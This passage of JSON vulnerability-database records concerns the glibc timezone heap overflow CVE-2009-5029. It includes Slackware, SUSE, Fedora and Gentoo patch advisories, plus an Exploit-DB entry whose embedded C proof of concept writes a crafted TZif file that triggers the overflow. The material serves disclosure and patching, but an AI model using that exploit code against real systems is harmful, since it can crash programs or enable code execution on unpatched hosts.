13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-2.11.1-i486-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-i18n-2.11.1-i486-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-profile-2.11.1-i486-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-solibs-2.11.1-i486-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-zoneinfo-2.11.1-noarch-6_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-2.11.1-x86_64-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-i18n-2.11.1-x86_64-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-profile-2.11.1-x86_64-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-solibs-2.11.1-x86_64-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-zoneinfo-2.11.1-noarch-6_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-2.13-i486-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-i18n-2.13-i486-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-profile-2.13-i486-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-solibs-2.13-i486-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-zoneinfo-2.13-noarch-5_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-2.13-x86_64-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-i18n-2.13-x86_64-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-profile-2.13-x86_64-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-solibs-2.13-x86_64-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-zoneinfo-2.13-noarch-5_slack13.37.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-solibs-2.14.1-i486-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-zoneinfo-2011i_2011n-noarch-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-2.14.1-i486-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-i18n-2.14.1-i486-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-profile-2.14.1-i486-4.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-solibs-2.14.1-x86_64-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-zoneinfo-2011i_2011n-noarch-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-2.14.1-x86_64-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-i18n-2.14.1-x86_64-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-profile-2.14.1-x86_64-4.txz\n\n\nMD5 signatures:\n\nSlackware 13.1 packages:\nc7f0d5af7b32d6259272956bf1621ce0 glibc-2.11.1-i486-6_slack13.1.txz\nd80c53f769a30b407e303eb440e326e3 glibc-i18n-2.11.1-i486-6_slack13.1.txz\n6b9eb872a8368a13d71cecf8e031d2be glibc-profile-2.11.1-i486-6_slack13.1.txz\nba34c30c27d42c61190979884e8b8697 glibc-solibs-2.11.1-i486-6_slack13.1.txz\n74afbffcfb20ac6235945930a8a0ac57 glibc-zoneinfo-2.11.1-noarch-6_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\na9bfcb4a0fde94a9355ecce905bb3ba4 glibc-2.11.1-x86_64-6_slack13.1.txz\n6f7df8a5ac48f364fff364f679430ea5 glibc-i18n-2.11.1-x86_64-6_slack13.1.txz\n1590ae7b50153b2d28489b9192126120 glibc-profile-2.11.1-x86_64-6_slack13.1.txz\n067bcd52acc3552bf2a77126fd12605e glibc-solibs-2.11.1-x86_64-6_slack13.1.txz\nce56ec387a50c00425d4dcf88ba71ee2 glibc-zoneinfo-2.11.1-noarch-6_slack13.1.txz\n\nSlackware 13.37 packages:\ndacaa396b83346f0313e85356ba496ad glibc-2.13-i486-5_slack13.37.txz\ne6238c92c6a97a56274d91e342e2ef07 glibc-i18n-2.13-i486-5_slack13.37.txz\naca444c2c834c1bbbb1fdcd08f381f5d glibc-profile-2.13-i486-5_slack13.37.txz\n04db99e0770b06af713322daa35f9463 glibc-solibs-2.13-i486-5_slack13.37.txz\nfe22b8ba56e8a14d025943d6a53f0a22 glibc-zoneinfo-2.13-noarch-5_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\nab90f9581621a4b9e1f41fdd1c583a25 glibc-2.13-x86_64-5_slack13.37.txz\nd82fef5b1e734c9fd9aee358139dccaa glibc-i18n-2.13-x86_64-5_slack13.37.txz\nf26848e2ef7a2ed367a73fded8d51e2a glibc-profile-2.13-x86_64-5_slack13.37.txz\n1f4b8e716764c98c7c261fb7d7c19557 glibc-solibs-2.13-x86_64-5_slack13.37.txz\n553c32ce3937c8700dde84bad4b5467c glibc-zoneinfo-2.13-noarch-5_slack13.37.txz\n\nSlackware -current packages:\ncc98a5b0a120a3350b17d087af3a2163 a/glibc-solibs-2.14.1-i486-4.txz\nb549864a76c55b71f385eaf9077cf6ac a/glibc-zoneinfo-2011i_2011n-noarch-4.txz\n8522cbc56aec9af6c9c8e58fb5ee71c4 l/glibc-2.14.1-i486-4.txz\n98561de06536ce17b221774f39316933 l/glibc-i18n-2.14.1-i486-4.txz\n8a7ac4e4796eaefc6447222f7ce6eedf l/glibc-profile-2.14.1-i486-4.txz\n\nSlackware x86_64 -current packages:\n83121e8a4e8e46d2faa58221382f914c a/glibc-solibs-2.14.1-x86_64-4.txz\n8245bc6fb5e59fa905df708391bd3f89 a/glibc-zoneinfo-2011i_2011n-noarch-4.txz\nca3c22ff543e900bfd4516ba4af7cf34 l/glibc-2.14.1-x86_64-4.txz\ne2650c24a1a69138f544e98d8653f2a9 l/glibc-i18n-2.14.1-x86_64-4.txz\n23c2f013552e8a0561168897866fcb53 l/glibc-profile-2.14.1-x86_64-4.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg glibc-2.13-i486-5_slack13.37.txz glibc-i18n-2.13-i486-5_slack13.37.txz glibc-profile-2.13-i486-5_slack13.37.txz glibc-solibs-2.13-i486-5_slack13.37.txz glibc-zoneinfo-2.13-noarch-5_slack13.37.txz", "modified": "2012-02-10T17:44:30", "published": "2012-02-10T17:44:30", "id": "SSA-2012-041-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2012&m=slackware-security.806982", "type": "slackware", "title": "[slackware-security] glibc", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T03:26:33", "description": "GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability. CVE-2009-5029. Dos exploit for linux platform", "published": "2009-06-01T00:00:00", "type": "exploitdb", "title": "GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-5029"], "modified": "2009-06-01T00:00:00", "id": "EDB-ID:36404", "href": "https://www.exploit-db.com/exploits/36404/", "sourceData": "source: http://www.securityfocus.com/bid/50898/info\r\n\r\nGNU glibc is prone to an remote integer-overflow vulnerability.\r\n\r\nAn attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that uses the affected library. \r\n\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n#include <string.h>\r\n \r\n#define TZ_MAGIC \"TZif\"\r\n \r\n#define PUT_32BIT_MSB(cp, value) \\\r\n do { \\\r\n (cp)[0] = (value) >> 24; \\\r\n (cp)[1] = (value) >> 16; \\\r\n (cp)[2] = (value) >> 8; \\\r\n (cp)[3] = (value); \\\r\n } while (0)\r\n \r\nstruct tzhead {\r\n char tzh_magic[4];\r\n char tzh_version[1];\r\n char tzh_reserved[15];\r\n char tzh_ttisgmtcnt[4];\r\n char tzh_ttisstdcnt[4];\r\n char tzh_leapcnt[4];\r\n char tzh_timecnt[4];\r\n char tzh_typecnt[4];\r\n char tzh_charcnt[4];\r\n};\r\n \r\nstruct ttinfo\r\n {\r\n long int offset;\r\n unsigned char isdst;\r\n unsigned char idx;\r\n unsigned char isstd;\r\n unsigned char isgmt;\r\n };\r\nint main(void)\r\n{\r\n struct tzhead evil;\r\n int i;\r\n char *p;\r\n42\r\n uint32_t total_size;\r\n uint32_t evil1, evil2;\r\n \r\n /* Initialize static part of the header */\r\n memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1);\r\n evil.tzh_version[0] = 0;\r\n memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved));\r\n memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt));\r\n memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt));\r\n memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt));\r\n memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt));\r\n \r\n /* Initialize nasty part of the header */\r\n evil1 = 500;\r\n PUT_32BIT_MSB(evil.tzh_timecnt, evil1);\r\n \r\n total_size = evil1 * (sizeof(time_t) + 1);\r\n total_size = ((total_size + __alignof__ (struct ttinfo) - 1)\r\n & ~(__alignof__ (struct ttinfo) - 1));\r\n \r\n /* value of chars, to get a malloc(0) */\r\n evil2 = 0 - total_size;\r\n PUT_32BIT_MSB(evil.tzh_charcnt, evil2);\r\n p = (char *)&evil;\r\n for (i = 0; i < sizeof(evil); i++)\r\n printf(\"%c\", p[i]);\r\n \r\n /* data we overflow with */\r\n for (i = 0; i < 50000; i++)\r\n printf(\"A\");\r\n}\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/36404/"}], "suse": [{"lastseen": "2016-09-04T11:45:28", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "description": "Specially crafted time zone files could cause a heap\n overflow in glibc (CVE-2009-5029).\n\n", "edition": 1, "modified": "2012-01-05T19:08:22", "published": "2012-01-05T19:08:22", "id": "OPENSUSE-SU-2012:0064-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00040.html", "title": "glibc (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:56:09", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "description": "The following bug has been fixed:\n\n * Specially crafted time zone files could cause a heap\n overflow in glibc.\n", "edition": 1, "modified": "2012-01-05T12:25:46", "published": "2012-01-05T12:25:46", "id": "SUSE-SU-2012:0033-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00032.html", "title": "Security update for glibc (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:46:38", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "description": "The following bug has been fixed:\n\n * Specially crafted time zone files could cause a heap\n overflow in glibc.\n", "edition": 1, "modified": "2012-01-05T12:36:28", "published": "2012-01-05T12:36:28", "id": "SUSE-SU-2012:0055-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00037.html", "type": "suse", "title": "Security update for glibc (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:43:32", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "description": "The following bug has been fixed:\n\n * Specially crafted time zone files could cause a heap\n overflow in glibc.\n", "edition": 1, "modified": "2012-01-05T12:08:52", "published": "2012-01-05T12:08:52", "id": "SUSE-SU-2012:0023-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00030.html", "title": "Security update for glibc (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. ", "modified": "2012-01-17T20:24:50", "published": "2012-01-17T20:24:50", "id": "FEDORA:D91FC208AA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: glibc-2.14.1-5", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:23", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2010-3847", "CVE-2009-5029", "CVE-2011-0536", "CVE-2011-1089"], "edition": 1, "description": "### Background\n\nThe GNU C library is the standard C library used by Gentoo Linux systems. \n\n### Description\n\nMultiple vulnerabilities have been discovered in GNU C Library. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA local attacker could trigger vulnerabilities in dynamic library loader, making it possible to load attacker-controlled shared objects during execution of setuid/setgid programs to escalate privileges. \n\nA context-dependent attacker could trigger various vulnerabilities in GNU C Library, including a buffer overflow, leading to execution of arbitrary code or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll GNU C Library users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-libs/glibc-2.15-r3\"", "modified": "2013-12-03T00:00:00", "published": "2013-12-03T00:00:00", "id": "GLSA-201312-01", "href": "https://security.gentoo.org/glsa/201312-01", "type": "gentoo", "title": "GNU C Library: Multiple vulnerabilities", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
